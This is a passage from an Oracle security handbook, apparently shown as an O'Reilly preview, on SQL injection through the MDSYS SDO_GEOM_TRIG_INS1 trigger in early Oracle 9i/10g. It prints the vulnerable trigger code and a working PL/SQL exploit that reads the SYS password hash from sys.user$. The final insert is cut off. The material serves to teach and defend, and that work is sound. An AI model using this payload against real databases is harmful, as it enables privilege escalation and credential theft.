6.2. Examples of Exploiting Triggers

Now, let's look at some real-world examples.

6.2.1. The MDSYS.SDO_GEOM_TRIG_INS1 and SDO_GEOM_TRIG_INS1 Triggers

In early versions of both 9i and 10g, the SDO_GEOM_TRIG_INS1 trigger owned by 10g was vulnerable to SQL injection in a similar way to the example shown in the preceding section. The trigger fires when an INSERT is performed on the USER_SDO_GEOM_METADATA table, again owned by MDSYS. As PUBLIC has the permission to INSERT into this table, anyone can get the trigger to fire. The trigger executes the following PL/SQL:

..
..
EXECUTE IMMEDIATE
'SELECT user FROM dual' into tname;
stmt := 'SELECT count(*) FROM SDO_GEOM_METADATA_TABLE ' ||
'WHERE sdo_owner = ''' || tname || ''' ' ||
'  AND sdo_table_name = ''' || :n.table_name || ''' '||
'  AND sdo_column_name = ''' || :n.column_name || ''' ';
..
..

Here, the :new.table_name and :new.column_name can be influenced by the user and SQL injected. PUBLIC has the permissions to INSERT into this table. As such, the trigger can be abused to run SQL as MDSYS. For example, a low-privilege user can select the password hash for SYS from the USER$ table:

set serveroutput on create or replace function y return varchar2 authid current_user is buffer varchar2(30); stmt varchar2(200):='select password from sys.user$ where name =''SYS'''; begin execute immediate stmt into buffer; dbms_output.put_line('SYS passord is: '|| buffer); return 'foo'; end; / grant execute on y to public; insert into mdsys.user_sdo_geom_metadata ...

Get The Oracle® Hacker's Handbook: Hacking and Defending Oracle now with O’Reilly online learning.

O’Reilly members experience live online training, plus books, videos, and digital content from 200+ publishers.